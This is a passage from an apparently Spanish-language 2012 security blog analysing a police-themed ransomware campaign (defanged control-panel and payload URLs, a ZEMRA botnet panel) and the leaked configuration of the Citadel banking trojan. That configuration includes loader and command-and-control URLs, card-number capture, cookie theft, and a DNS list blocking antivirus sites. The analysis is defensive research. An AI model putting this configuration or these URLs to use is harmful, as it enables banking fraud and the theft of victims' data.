<span style="font-family: Arial; font-size: 11.0pt;">hXXp://invalid-crew.com/start.php<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">que
comprobará la configuración del idioma que tenga el usuario instalado en el
navegador para mostrar la pantalla falsa en el idioma del usuario, simulando
además las instituciones legitimas de dicho país que se dedican a proteger los
derechos de autor y propiedad intelectual.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Para los
usuarios españoles el troyano llevará hacia la dirección:<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">hXXp://invalid-crew.com/payz/iframe_ES.php<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Que
mostrará la siguiente pantalla simulando provenir de las SGAE:<o:p></o:p></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-N--PjoI6H5g/UF-EMMasydI/AAAAAAAAALo/2aiD2AFQTRM/s1600/ES.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="489" src="http://2.bp.blogspot.com/-N--PjoI6H5g/UF-EMMasydI/AAAAAAAAALo/2aiD2AFQTRM/s640/ES.jpg" width="640" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">Para
Portugal:</span><span style="font-family: Arial; font-size: 11pt;"> </span><span style="font-family: Arial; font-size: 11pt;">hXXp://invalid-crew.com/payz/iframe_PT.php</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-o_fR9rFrID8/UF-ETpMLm4I/AAAAAAAAALw/vbEF6NDkmp4/s1600/PT.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="464" src="http://2.bp.blogspot.com/-o_fR9rFrID8/UF-ETpMLm4I/AAAAAAAAALw/vbEF6NDkmp4/s640/PT.jpg" width="640" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Para
Italia: hXXp://invalid-crew.com/payz/iframe_IT.php<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-ocvXQt7yrDQ/UF-Ejotv_lI/AAAAAAAAAL4/3D81bJCGeH8/s1600/IT.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="432" src="http://4.bp.blogspot.com/-ocvXQt7yrDQ/UF-Ejotv_lI/AAAAAAAAAL4/3D81bJCGeH8/s640/IT.jpg" width="640" /></a></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">Para
Francia:</span><span style="font-family: Arial; font-size: 11pt;"> </span><span style="font-family: Arial; font-size: 11pt;">hXXp://invalid-crew.com/payz/iframe_FR.php</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-goUI09TfMVU/UF-EriOKbGI/AAAAAAAAAMA/RL7GnpJEHis/s1600/FR.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="468" src="http://3.bp.blogspot.com/-goUI09TfMVU/UF-EriOKbGI/AAAAAAAAAMA/RL7GnpJEHis/s640/FR.jpg" width="640" /></a></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Para
Alemania: hXXp://invalid-crew.com/payz/iframe_DE.php<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-xmLzdUDpFCw/UF-EyBtwqNI/AAAAAAAAAMI/EwlkO0JIpiE/s1600/DE.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="472" src="http://4.bp.blogspot.com/-xmLzdUDpFCw/UF-EyBtwqNI/AAAAAAAAAMI/EwlkO0JIpiE/s640/DE.jpg" width="640" /></a></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">El dominio<b><i>
invalid-crew.com</i></b> esta alojado en </span><st1:personname productid="la IP" style="font-family: Arial; font-size: 11pt;" w:st="on">la
IP</st1:personname><span style="font-family: Arial; font-size: 11pt;"> 95.163.68.147 perteneciente al proveedor Digital Networks
CJSC de Rusia.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"> </span><span style="font-family: Arial; font-size: 11pt;">Las
pantallas de acceso al Panel de Control del troyano se ha localizado en las
direcciones:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">hXXp://invalid-crew.com/admin/login.php<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">y<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">hXXp://invalid-crew.com/bull/login.php<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-uZDbCDx9BSw/UF-E8Tdqu1I/AAAAAAAAAMQ/Du6q_NfPH4E/s1600/Ransomeware-Panel.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="277" src="http://1.bp.blogspot.com/-uZDbCDx9BSw/UF-E8Tdqu1I/AAAAAAAAAMQ/Du6q_NfPH4E/s400/Ransomeware-Panel.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">También se
ha localizado el Panel de control de <st1:personname productid="la BOTNET ZEMRA" w:st="on"><st1:personname productid="la BOTNET" w:st="on">la BOTNET</st1:personname>
ZEMRA</st1:personname> en la dirección:<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">hXXp://invalid-crew.com/abc/admin/<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-tDX-4fHvXaA/UF-FDqv6HkI/AAAAAAAAAMY/XOwsB0H7HeI/s1600/login.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="287" src="http://4.bp.blogspot.com/-tDX-4fHvXaA/UF-FDqv6HkI/AAAAAAAAAMY/XOwsB0H7HeI/s400/login.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Este panel
controla 5384 equipos de usuarios infectados, existiendo un porcentaje bastante
alto de usuarios latinos con su equipo comprometido.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-Dmm338SHGOM/UF-FKHLsg3I/AAAAAAAAAMg/tW5oQutY8GI/s1600/statitics.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="287" src="http://4.bp.blogspot.com/-Dmm338SHGOM/UF-FKHLsg3I/AAAAAAAAAMg/tW5oQutY8GI/s400/statitics.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Según el
menú estadístico de seguimiento de bots infectados, la propagación de malware
se inicio el 3 de septiembre , siendo el día pico de infecciones el 5 de Septiembre
con 2402 equipos infectados:<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-WSdsJ6n2RHs/UF-FQqkOxxI/AAAAAAAAAMo/9inyPh3_T9U/s1600/infects.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="203" src="http://3.bp.blogspot.com/-WSdsJ6n2RHs/UF-FQqkOxxI/AAAAAAAAAMo/9inyPh3_T9U/s400/infects.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">También se
puede visualizar en este panel el seguimiento de las tareas de descarga de los
distintos binarios maliciosos en los equipos de los usuarios zombies.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-WbHFKz67y4I/UF-FXQORVfI/AAAAAAAAAMw/B_AF5yqQtXM/s1600/tasks.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="310" src="http://2.bp.blogspot.com/-WbHFKz67y4I/UF-FXQORVfI/AAAAAAAAAMw/B_AF5yqQtXM/s400/tasks.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Todavía
están activos los vectores de infección de los troyanos:<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"> </span><span style="font-family: Arial; font-size: 11pt;"> </span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">hXXp://95.163.68.147/abc/rat.exe<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">hXXp://95.163.68.147/abc/rat1.exe<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">hXXp://95.163.68.147/abc/fud.exe<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">hXXp://95.163.68.147/abc/server.exe<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">hXXp://95.163.68.147/abc/cgg.exe<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
Jose Dos Santoshttp://www.blogger.com/profile/06085925687781351552noreply@blogger.com0tag:blogger.com,1999:blog-5707299821054210891.post-38267025192176061282012-09-18T15:27:00.000-07:002012-09-18T15:27:01.494-07:00Archivo de configuración del troyano Citadel Builder 1.3.4.5 <br />
<div class="MsoNormal">
<span style="font-family: Arial;">En este documento se
presenta el fichero de configuración que utiliza el troyano Citadel , sucesor
del famoso troyano bancario Zeus y que se utiliza para crear el binario
malicioso que va a infectar a los usuarios y que posteriormente se comunicara
con el servidor donde este alojada toda la infraestructura criminal.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial;">Entre las novedades de esta
nueva versión destaca su configuración modular
dependiendo de los complementos que se hayan comprado en el mercado
negro.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial;">Uno de estos módulos se
trata del CardSwipe </span><span style="font-family: Arial; font-size: small;">( Banda </span><span style="font-family: Arial;">Magnética</span><span style="font-family: Arial; font-size: small;">)</span><span style="font-family: Arial; font-size: 10pt;"> </span><span style="font-family: Arial;">cuya finalidad es la captura de todos los datos de
las tarjetas de crédito necesarios para operar fraudulentamente con ellas.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial;">En este fichero de
configuración los criminales tienen activada esta opción:<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> enable_luhn10_get 1<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> enable_luhn10_post 1<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial;">Incluso se ha logrado
reproducir la inyección que realiza el troyano en la máquina infectada
capturando la pantalla que presenta para que el usuario introduzca todos sus
datos de la tarjeta de crédito cuando accede a su banca por Internet.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-QMS2kG7KC60/UFjYRmWhoLI/AAAAAAAAALI/jnBb41xvl8w/s1600/inject.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="160" src="http://1.bp.blogspot.com/-QMS2kG7KC60/UFjYRmWhoLI/AAAAAAAAALI/jnBb41xvl8w/s400/inject.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial;">Se observa como se solicita
el numero secreto del PIN ( ATM Pin) y su código de identificación de la
seguridad social (SSN) , datos que nunca son solicitados al cliente bajo
ninguna circunstancia.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial;">Otros parámetros de la
configuración permite la captura de secuencias de video del equipo infectado<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">use_module_video
0<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">entry
"Video"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> quality 1<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> length 500<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> end<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial;">Esto es muy útil para
capturar la secuencia en tiempo real cuando el usuario introduce los códigos
secretos de autorización de transferencia y evadir los sistemas de
autenticación mediante teclado virtual.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 12pt;">Otros comandos también</span><span style="font-family: Arial;"> permiten capturar los
datos enviados a través del navegador Chrome, habilitar la protección contra
máquinas virtuales es impedir que el binario pueda ser analizado en estos
entornos, desactivar el envio de cookies y bloquear el acceso a los sitios webs
de las compañías de antivirus y protección contra malware. Redirigiendo al
usuario a la pagina principal de Google ( </span><span style="background-color: white; color: #333333; font-family: Arial; font-size: 13px; line-height: 20.78333282470703px;">209.85.229.104) </span><span style="font-family: Arial;">cada vez que intenta acceder a ellas.
Para ello no modifica el archivo hosts del equipo infectado sino que controla
la cache DNS del equipo.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial;">Incluso también bloquea el
acceso a las paginas de los cuerpos de seguridad y de lucha contra el
cibercrimen.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-6Zm8lZ5gsPc/UFjYXrUEozI/AAAAAAAAALQ/zny2fW0rEfU/s1600/hosts-policia.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://3.bp.blogspot.com/-6Zm8lZ5gsPc/UFjYXrUEozI/AAAAAAAAALQ/zny2fW0rEfU/s320/hosts-policia.jpg" width="320" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial;">A continuación pasamos a
mostrar la configuración del Citadel Builder 1.3.4.5<o:p></o:p></span></div>
<div style="border-bottom: solid windowtext 1.0pt; border: none; mso-border-bottom-alt: solid windowtext .75pt; mso-element: para-border-div; padding: 0cm 0cm 1.0pt 0cm;">
<div class="MsoNormal" style="border: none; mso-border-bottom-alt: solid windowtext .75pt; mso-padding-alt: 0cm 0cm 1.0pt 0cm; padding: 0cm;">
<br /></div>
</div>
<br />
<br />
<br />
<div class="MsoNormal">
</div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">;; Default
config + updated AV's list (redirect to google.com)<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">;; Citadel
Builder 1.3.4.5<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">;; SHORT
MANUAL BELOW ------------><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">;;
url_config1 is required!!! url_config2 & url_config3 are optional, you can
setup it like a reserve config host.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">;;
report_software - report to gate about installed firewall,antivirus,software: 1
is enabled<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">;;
disable_antivirus 0/1 - if you bought the MiniAV module, you can switch it off.
0 is enabled.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">;;
enable_luhn10_get 1/0 - if you bought the CardSwipe module, you can switch it
on a GET parsing by LUHN10 algorithm.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">;;
enable_luhn10_post 1/0 - if you bought the CardSwipe module, you can switch it
on a POST parsing by LUHN10 algorithm(en.wikipedia.org/wiki/Luhn_algorithm).<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">;;
use_module_video 1/0 - Do you really want to use video grabber? If no, please
switch it off. 1 is enabled.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">;;
disable_httpgrabber 1/0 - Do you want to switch off Chrome HTTP : // logs
grabber? 1 is enabled.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">;;
package_max_size 50 - logs reports transmission size(KB), stay it as default.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">;;
timer_autoupdate 10 - Auto-update of exe file, specify time in hours. This
option takes exe link from "url_loader" section.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">;;
antiemulation_enable 0/1 - if you enable it, you can't test it on virtual
machines such as VMWare/Virtualbox.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">;;
disable_cookies 0/1 - if you setup 0, then cookies will send to your gate and
.sol files will be deleted. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">;; For
other information please open the "Personal Manual"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">;; IF YOU
DON'T KNOW HOW TO SETUP THESE OPTIONS, YOU CAN USE OPTIMAL DEFAULT CONFIG.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">;;
<------------------ END OF SHORT MANUAL.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">entry
"StaticConfig"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> botnet "main"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> timer_config 15 20<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> timer_logs
7 20<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> timer_stats 10 20<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> timer_modules 7 10<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> timer_autoupdate 8<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> url_config1 "http : //gremlindefault.net/mainsession/game_install.bin"<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> remove_certs 1<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">; disable_tcpserver 0<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> disable_cookies 0<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> disable_httpgrabber 1<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> report_software 1<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> disable_antivirus 0<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> enable_luhn10_get 1<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> enable_luhn10_post 1<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> antiemulation_enable 0<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> encryption_key "*******************************"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> use_module_video 0<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">end<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">entry
"DynamicConfig"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> url_loader "http : //gremlindefault.net/mainsession/bbbllasw.exe"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> url_server "http : //gremlindefault.net/mainsession/redir.php"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> file_webinjects "webinjects.txt"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> entry "AdvancedConfigs"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> "http : //gremlindefault.net/mainsession/game_install.bin"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> end<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> entry "WebFilters"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> "!http : //*"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> end<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> entry "WebDataFilters"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> ;"http : //mail.rambler.ru/*"
"passw;login"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> end<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> entry "WebFakes"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> ;"http : //www.google.com" "http
: //www.yahoo.com" "GP" "" ""<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> end<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> entry "DnsFilters"<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">bitdefender.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">download.bitdefender.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">update.bitdefender.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">wfbs51-p.activeupdate.trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">wfbs60-p.activeupdate.trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">iau.trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">licenseupdate.trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">csm-as.activeupdate.trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">wfbs6-icss-p.activeupdate.trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">oc.activeupdate.trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">update.avg.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">update.grisoft.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">backup.avg.cz=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">backup.grisoft.cz=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">files2.grisoft.cz=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">files2.avg.cz=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">download.grisoft.cz=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">download.avg.cz=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">akamai.grisoft.cz=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">akamai.grisoft.cz.edgesuite.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">akamai.avg.cz=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">akamai.avg.cz.edgesuite.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">akamai.grisoft.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">akamai.avg.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">akamai.grisoft.com.edgesuite.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">akamai.avg.com.edgesuite.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">data-cdn.mbamupdates.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">su.pctools.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">pctools.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">download.lavasoft.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">secure.lavasoft.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">lavasoft.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">bitdefender.nl=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">virustotal.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">trendmicro.nl=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">trendmicro.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.trendmicro.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">securesoft.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
